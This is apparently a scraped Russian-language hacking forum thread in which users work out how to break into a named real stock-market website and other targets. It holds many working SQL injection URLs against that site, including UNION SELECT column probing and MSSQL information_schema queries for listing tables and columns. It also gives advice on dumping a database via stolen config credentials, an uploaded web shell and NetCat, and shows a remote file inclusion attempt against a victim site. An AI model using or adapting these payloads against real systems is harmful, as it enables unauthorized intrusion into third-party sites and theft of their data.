смотри как инекции проводить в mssql


гыгы сайт то не пашет http://wallstreetcorner.com/ss2.htm

и даже при http://wallstreetcorner.com/ss2.html?Symbol=1 ошибка)

смотри как инекции проводить в mssql

Microsoft Access Driver

MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.

Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'

смотри как инекции проводить в mssql

Какой mssql??


ODBC API call: 'statement executeDirect:' returned the following error message: '
{execDirect}[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Symbol = ''' ORDER BY ID'. (sqlState: 37000)
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID


При чем здесь MSSQL ?

т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)
Зайди в тему "Энциклопедия уязвимых скриптов" да и посмотри
(имхо sql-inj чаще встречается)

на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да?
Почему это?

1. Сливаешь конфиг файл для подкл. к БД, смотришь пароль, пробуешь зайти под админом и под паролем который был в конфиге к примеру на форум, если захошел то заливаешь шелл и потом сливаешь БД через шелл

2. Если сервис sql доступен из интернета то просто подкл. к нему с помощью какой либо утилиты (я для этого юзаю NetCat)

про LFI/RFI-уязвимости читал ЗДЕСЬ , но не очень понятно был что, зачем и как.. попробую еще искать ...
Ну ты думаешь своей головою? Тебе надо искать мануалы по lfi/rfi а не уязвимости в движках (я понимаю что хочется понять вот так сразу но надо с мануалов начинать)

перепутал))

суть в том что сайт сам не пашет.

MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.

Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'

+ EwXx08.120@Windows 2000 5.0)

смотри как инекции проводить в mssql


гыгы сайт то не пашет http://wallstreetcorner.com/ss2.htm

и даже при http://wallstreetcorner.com/ss2.html?Symbol=1 ошибка)

я уже пробовал стандартные методы инъекций

http://wallstreetcorner.com/disclaimer.html?Symbol=' пашет

http://wallstreetcorner.com/disclaimer.html?Symbol='+order+by+45,46,47,48,49,5 0+union+select+1+from+Situations+where+'1
& use https://forum.antichat.ru/thread50550.html
/add краткость сестра таланта:
http://wallstreetcorner.com/disclaimer.html?Symbol='order+by+47%00

http://www.site.com/ShopList.asp?Cat=-34+union+select+1,2,3,4,5,6,table_name,8+from+info rmation_schema.tables--
Получил таблицу MyAccessLog БД MS SQL,в мускуле используется лимит,а сдесь как сделать чтобы получить имена остальных таблиц?Пробовал как в статьях 1 or 1=@@version-- и тд,запросы такие неработают.

2Fed123,

cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from +information_schema.tables+where+table_name+not+in +(select+top+1+table_name+from+information_schema. tables)--

Хм ну как-то так вроде, поэкспериментируй

where table_name NOT IN ('table_name1')

http://wallstreetcorner.com/disclaimer.html?Symbol='+order+by+45,46,47,48,49,5 0+union+select+1+from+Situations+where+'1
& use https://forum.antichat.ru/thread50550.html
/add краткость сестра таланта:
http://wallstreetcorner.com/disclaimer.html?Symbol='order+by+47%00
спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?

спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?


http://wallstreetcorner.com/disclaimer.html?Symbol=TCRV%27+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46+from+Situations%00

2Fed123,

cat=-1+union+select+top+1+1,2,3,4,5,6,table_name,8+from +information_schema.tables+where+table_name+not+in +(select+top+1+table_name+from+information_schema. tables)--

Хм ну как-то так вроде, поэкспериментируй
Спасибо,все получилось.Теперь пролема с колонками :D
При запросе -34+union+select+top+1+1,2,3,4,5,6,column_name,8+FR OM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyU sers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_N AME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers)
страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется

Спасибо,все получилось.Теперь пролема с колонками :D
При запросе -34+union+select+top+1+1,2,3,4,5,6,column_name,8+FR OM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyU sers+AND+COLUMN_NAME+NOT+IN+(SELECT+TOP+1+COLUMN_N AME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=MyUsers)
страница нормально отображается,но ничего невыводит.И если несложно объясни как и зачем все пишется
-34+UNION+SELECT+1,2,3,4,5,6, COLUMN_NAME,8+FROM INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=’MyU sers’ +LIMIT+1,1--
почитать можно тут:
https://forum.antichat.ru/thread43966.html

']http://wallstreetcorner.com/disclaimer.html?Symbol=TCRV%27+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46+from+Situations%00

правильнее этот запрос:

http://wallstreetcorner.com/disclaimer.html?Symbol='+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46+from+Situations+where+1%00

выдает открывает страницу норм, но там нету ни одного visible поля (((

правильнее этот запрос:

http://wallstreetcorner.com/disclaimer.html?Symbol='+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46+from+Situations+where+1%00

выдает открывает страницу норм, но там нету ни одного visible поля (((
чем он правильнее???


скуля не принтабельна, поэтому и не выводится ниодного поля

http://wallstreetcorner.com/ss2.html?Symbol=%'%20union%20select%201,2,3,4,5,6, 7,8,'Privetttt',10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45,46%20from%20Situations%00
Только понта с этого нету.
Выводится в адресную строку браузера 9 поле где привет написано)

наконец себе делал хост и пытаюсь поэкспереминтировать PHP инекции.
у меня сайт такой:
www.mysite.ru
цель: www.123.ru

на мой сайт залил скрипт:
<?
..
Include ("$page.php");
…
?>
открываю сайт жертвы, захожу в любой раздел и получаю такой адрес:
http://www.123.ru/index.php?action=page&id=149

мой код на сервере под названием ххх.php.

я переделываю ссылку так:
http://www.123.ru/index.php?action=http://mysite.ru/xxx.php
- открывается главная страница.
делаю так:
http://www.123.ru/index.php?action=page&id=http://mysite.ru/xxx.php
пишет:
Запрашиваемая вами страница не найдена.

Я ошибку делаю, или просто на сайте фильтровывается ?

P.S. читал здесь:
http://forum.antichat.ru/thread12123-lfi.html

что то ты путаешь, с чего ты взял что переменная id на сайте www.123.ru вообще что-то инклюдит, тем более что-то удаленное?

Да и инклудить надо не php скрипты на удалённом сервере...а txt например.

ммм, ребята, читая ЭТУ (http://forum.antichat.ru/thread12123.html) статью - так получается...
можете сказать как делать тогда ?